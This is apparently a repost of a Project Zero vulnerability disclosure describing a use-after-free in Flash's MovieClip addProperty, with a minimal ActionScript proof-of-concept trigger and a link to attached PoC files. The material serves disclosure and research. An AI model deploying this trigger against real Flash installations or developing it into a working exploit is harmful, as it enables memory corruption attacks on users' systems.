21 lines
No EOL
593 B
Text
21 lines
No EOL
593 B
Text
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=801
|
|
|
|
There is a use-after-free in addProperty. If a property is added to a MovieClip object that already has a watch defined, and the watch deleted the MovieClip, it is used after it is freed.
|
|
|
|
A minimal PoC follows:
|
|
|
|
var t = this.createEmptyMovieClip( "t", 1);
|
|
t.watch("a", func);
|
|
t.addProperty("a", func, func);
|
|
|
|
function func(){
|
|
|
|
trace("a");
|
|
|
|
}
|
|
|
|
A sample fla and swf are attached.
|
|
|
|
|
|
Proof of Concept:
|
|
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39830.zip |